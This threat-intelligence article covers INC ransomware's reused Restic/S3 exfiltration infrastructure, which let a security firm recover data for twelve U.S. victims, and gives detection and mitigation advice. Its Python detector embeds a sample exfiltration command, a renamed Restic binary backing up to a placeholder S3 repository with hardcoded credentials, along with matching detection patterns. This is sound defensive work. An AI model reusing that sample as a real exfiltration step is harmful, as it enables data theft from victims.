INC Ransomware OPSEC Fail: Reused Infrastructure Leads to Data Recovery for 12 U.S. Victims

INC Ransomware's Poor Operational Security Allows Security Firm to Recover Data for 12 U.S. Companies

MEDIUM
January 23, 2026
5m read
Ransomware, Incident Response, Threat Actor

Related Entities

Organizations: Cyber Centaurs

Products & Tech: Restic, AnyDesk, Revo Uninstaller, PowerShell

Other: RainINC, Mimikatz

Full Report

Executive Summary

In a rare turn of events, a major operational security (OPSEC) blunder by the INC Ransomware group has led to the full recovery of stolen data for twelve U.S. companies. Cybersecurity firm Cyber Centaurs made the discovery during a forensic investigation of an attack on one of its clients. The investigators found leftover artifacts from Restic, a legitimate open-source backup tool that the gang used for data exfiltration. Crucially, the attackers hardcoded the cloud storage repository details, including access keys and passwords, into their scripts. By analyzing these artifacts, Cyber Centaurs was able to access the threat actor's reused S3-compatible storage infrastructure, where they found the encrypted data backups of a dozen different victims from sectors including healthcare, manufacturing, and technology. This incident serves as a powerful reminder that deep forensic analysis can uncover attacker mistakes and lead to positive outcomes.


Incident Timeline

  1. Initial Incident: Cyber Centaurs was engaged by a client experiencing an active ransomware attack on a production SQL server by a RainINC ransomware variant.
  2. Forensic Discovery: During analysis, researchers found artifacts related to the Restic backup tool. These included renamed binaries (winupdate.exe), PowerShell scripts, and configuration files with hardcoded credentials for the gang's S3-compatible storage.
  3. Investigative Pivot: The team hypothesized that the INC group was reusing this exfiltration infrastructure across multiple victims for efficiency.
  4. Infrastructure Access: Using the recovered credentials, the researchers lawfully accessed the attacker-controlled cloud repositories.
  5. Data Recovery: Inside the storage buckets, they discovered encrypted Restic backups belonging to twelve different U.S. organizations, which were subsequently recovered.

The investigation also confirmed the use of other tools by the gang, including AnyDesk for remote access and Mimikatz for credential harvesting.

Technical Analysis

The core of this success was the attacker's poor OPSEC.

  • Infrastructure Reuse: To streamline their operations, the INC gang used the same cloud storage buckets and credentials for exfiltrating data from multiple victims. This created a single point of failure.
  • Hardcoded Credentials: The attackers embedded secret keys and passwords directly into their deployment scripts. This is a common but critical mistake that removes the need for investigators to crack passwords or find other ways to access the infrastructure.
  • Tool Artifacts: The failure to properly clean up their tools (T1070.004 - Indicator Removal: File Deletion) left behind the crucial Restic configuration files that unraveled their operation. Even though they used Revo Uninstaller, it was not sufficient.

Impact Assessment

While the outcome was positive for the twelve recovered companies, the incident still highlights the severe initial impact of an INC ransomware attack:

  • Significant Downtime: The initial ransomware deployment would have caused major business disruption for all victims.
  • Data Exposure Risk: Before recovery, the stolen data was in the hands of a dangerous threat actor, posing a significant breach risk.
  • Incident Response Costs: All affected organizations would have incurred substantial costs for forensic investigation, containment, and remediation.

This case demonstrates that even when data is exfiltrated, recovery can sometimes be possible through deep forensic investigation and by capitalizing on attacker errors.

Detection & Response

  1. Monitor for Dual-Use Tools: Security teams should monitor for the execution of legitimate tools that can be used for malicious purposes, such as Restic, Rclone, AnyDesk, and iperf3. Process execution logging is key. This aligns with D3FEND's Process Analysis (D3-PA).
  2. Analyze PowerShell Scripts: Scrutinize PowerShell scripts for hardcoded credentials, suspicious commands, or connections to external storage. Enable PowerShell Script Block Logging.
  3. Egress Traffic Monitoring (D3-NTA): Analyze outbound network traffic for large data transfers to cloud storage providers, especially if the tools or destinations are not part of standard business operations.
  4. Thorough Forensics: This case proves the value of not stopping an investigation at containment. A deep-dive forensic analysis of attacker artifacts can yield intelligence that benefits both the victim and the wider community.
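As an added example (not code from the report or from Cyber Centaurs), the following Python scans PowerShell script-block text, such as the body of Event ID 4104 records, for the artifact pattern described in the Technical Analysis and in item 2 above: credentials assigned as string literals, a Restic-style repository flag pointing at an S3-compatible backend, and such a command issued by a binary that is not named restic. The sample blocks, file paths and credential values are constructed placeholders.

```python
import re
from typing import Dict, List

# Constructed sample script-block text (Event ID 4104 style), not taken from the report.
# It mimics the artifact pattern the report describes: Restic renamed to winupdate.exe,
# an S3-compatible repository and hardcoded credentials. Every value is a placeholder.
SAMPLE_SCRIPT_BLOCKS: Dict[str, str] = {
    "block-1": (
        '$env:AWS_ACCESS_KEY_ID = "AKIAPLACEHOLDER0000"\n'
        '$env:AWS_SECRET_ACCESS_KEY = "placeholder-secret-key"\n'
        '$env:RESTIC_PASSWORD = "placeholder-repo-pass"\n'
        'C:\\Windows\\Temp\\winupdate.exe -r s3:https://storage.example.invalid/bucket backup "C:\\Data"\n'
    ),
    # Benign admin activity: must produce no findings.
    "block-2": 'Get-ChildItem C:\\Logs | Where-Object { $_.Length -gt 10MB }\n',
}

# Environment variables Restic and its S3 backend read; a literal assignment is a hardcoded secret.
CREDENTIAL_ENV_VARS = ("RESTIC_PASSWORD", "AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY")
ENV_ASSIGN = re.compile(r'\$env:(\w+)\s*=\s*["\'][^"\']+["\']', re.IGNORECASE)
# Restic CLI shape: "-r <repo>" or "--repo <repo>" with a backend prefix such as s3: or rclone:
REPO_FLAG = re.compile(r'(?:^|\s)(?:-r|--repo)\s+((?:s3|b2|rclone|sftp|rest|azure|gs):\S+)', re.IGNORECASE)
RESTIC_VERBS = re.compile(r'\b(backup|init|snapshots|restore|forget)\b')
NAMED_RESTIC = re.compile(r'(?:^|[\\/])restic(?:\.exe)?$', re.IGNORECASE)


def scan_script_block(text: str) -> List[str]:
    """Return human-readable findings for one script block (empty list if clean)."""
    findings: List[str] = []
    for m in ENV_ASSIGN.finditer(text):
        name = m.group(1).upper()
        if name in CREDENTIAL_ENV_VARS:
            findings.append(f"hardcoded credential: {name}")
    for line in text.splitlines():
        repo = REPO_FLAG.search(line)
        if not (repo and RESTIC_VERBS.search(line)):
            continue  # a repo flag without a Restic verb is not a Restic invocation
        backend = repo.group(1).split(":", 1)[0].lower()
        exe = line.split()[0]
        if NAMED_RESTIC.search(exe):
            findings.append(f"restic {backend} repository from {exe}")
        else:
            findings.append(f"restic-style {backend} repository from renamed binary {exe}")
    return findings


def scan_all(blocks: Dict[str, str]) -> Dict[str, List[str]]:
    """Scan every block; only blocks that produced findings appear in the result."""
    result: Dict[str, List[str]] = {}
    for block_id, text in blocks.items():
        hits = scan_script_block(text)
        if hits:
            result[block_id] = hits
    return result
```

Feed it the ScriptBlockText field exported from the Microsoft-Windows-PowerShell/Operational log; a hit on a renamed binary is the strongest signal, since legitimate Restic use rarely hides its name.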

Mitigation Recommendations

  1. Application Allow-listing (M1038 - Execution Prevention): Implement strict application control policies to prevent unauthorized software like Restic, AnyDesk, and other dual-use tools from running in the environment.
  2. Egress Filtering (M1037 - Filter Network Traffic): Block outbound connections to non-approved cloud storage services at the network perimeter.
  3. PowerShell Hardening: Configure PowerShell to run in Constrained Language Mode where possible and enable comprehensive logging (Script Block Logging, Module Logging, Transcription) to capture attacker activity.
  4. Credential Protection (M1043 - Credential Access Protection): Use technologies like Windows Defender Credential Guard to protect LSASS and prevent credential dumping by tools like Mimikatz.

MITRE ATT&CK Mitigations

  • Audit (M1047, Enterprise): Enable and collect detailed logs, especially command line and PowerShell logs, to allow for deep forensic analysis of attacker activity.
  • Execution Prevention (M1038, Enterprise): Use application control to prevent unauthorized dual-use tools like Restic and AnyDesk from running.
  • Filter Network Traffic (M1037, Enterprise): Strictly control outbound network connections and block traffic to unknown or unauthorized cloud storage endpoints.

Sources & References

  • "INC ransomware opsec fail allowed data recovery for 12 US orgs", BleepingComputer (bleepingcomputer.com), January 22, 2026
  • "Ransomware gang's slip-up led to data recovery for 12 US firms", CSO Online (csoonline.com), January 22, 2026
  • "When Ransomware Makes a Mistake: Inside INC Ransomware's Backup Infrastructure", Cyber Centaurs (cybercentaurs.com), January 22, 2026

Article Author

Jason Gomes

• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Focus areas: Threat Intelligence & Analysis, Security Orchestration (SOAR/XSOAR), Incident Response & Digital Forensics, Security Operations Center (SOC), SIEM & Security Analytics, Cyber Fusion & Threat Sharing, Security Automation & Integration, Managed Detection & Response (MDR)

Tags: OPSEC, Restic, Data Recovery, Incident Response, Forensics, S3
